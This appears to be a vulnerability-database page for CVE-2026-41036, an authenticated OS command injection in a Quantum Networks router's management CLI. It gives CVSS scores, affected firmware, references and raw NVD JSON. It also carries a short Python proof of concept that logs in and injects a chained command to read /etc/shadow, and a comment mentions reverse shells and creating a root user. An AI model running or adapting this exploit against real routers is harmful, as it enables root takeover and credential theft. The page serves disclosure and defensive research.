CVE-2026-41036

Description

This vulnerability exists in Quantum Networks router due to inadequate sanitization of user-supplied input in the management CLI interface. An authenticated remote attacker could exploit this vulnerability by injecting arbitrary OS commands on the targeted device. Successful exploitation of this vulnerability could allow the attacker to perform remote code execution with root privileges on the targeted device.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:qntmnet:qn-i-470_firmware:6.1.1.b1:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:qntmnet:qn-i-470:-:*:*:*:*:*:*:* - NOT VULNERABLE

Quantum Networks router (具体版本未披露)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import sys

def exploit(target_ip, target_port, username, password):
    # Connect to the management CLI interface
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_ip, target_port))
    
    # Receive initial banner
    print(s.recv(1024).decode())
    
    # Authenticate with low-privilege credentials
    payload = f"{username}\n{password}\n"
    s.send(payload.encode())
    print(s.recv(1024).decode())
    
    # Inject malicious command (e.g., create a root user or reverse shell)
    # Using semicolon to chain commands
    malicious_cmd = "system; id; cat /etc/shadow\n"
    s.send(malicious_cmd.encode())
    
    # Receive output
    result = s.recv(4096).decode()
    print("[+] Exploit Result:")
    print(result)
    s.close()

if __name__ == "__main__":
    # Usage: python poc.py <IP> <PORT> <USER> <PASS>
    if len(sys.argv) != 5:
        print("Usage: python poc.py <IP> <PORT> <USER> <PASS>")
        sys.exit(1)
    exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41036
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41036
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41036/
[4] VulDB https://vuldb.com/cve/CVE-2026-41036
[5] https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0200

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41036", "sourceIdentifier": "[email protected]", "published": "2026-04-21T10:16:30.800", "lastModified": "2026-05-06T18:11:44.540", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "This vulnerability exists in Quantum Networks router due to inadequate sanitization of user-supplied input in the management CLI interface. An authenticated remote attacker could exploit this vulnerability by injecting arbitrary OS commands on the targeted device.\n\nSuccessful exploitation of this vulnerability could allow the attacker to perform remote code execution with root privileges on the targeted device."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qntmnet:qn-i-470_firmware:6.1.1.b1:*:*:*:*:*:*:*", "matchCriteriaId": "A9418B1D-1A2C-4134-BF4A-854F6942D3DE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qntmnet:qn-i-470:-:*:*:*:*:*:*:*", "matchCriteriaId": "695A22BB-D237-4EB0-B4F7-901C86E98625"}]}]}], "references": [{"url": "https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0200", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}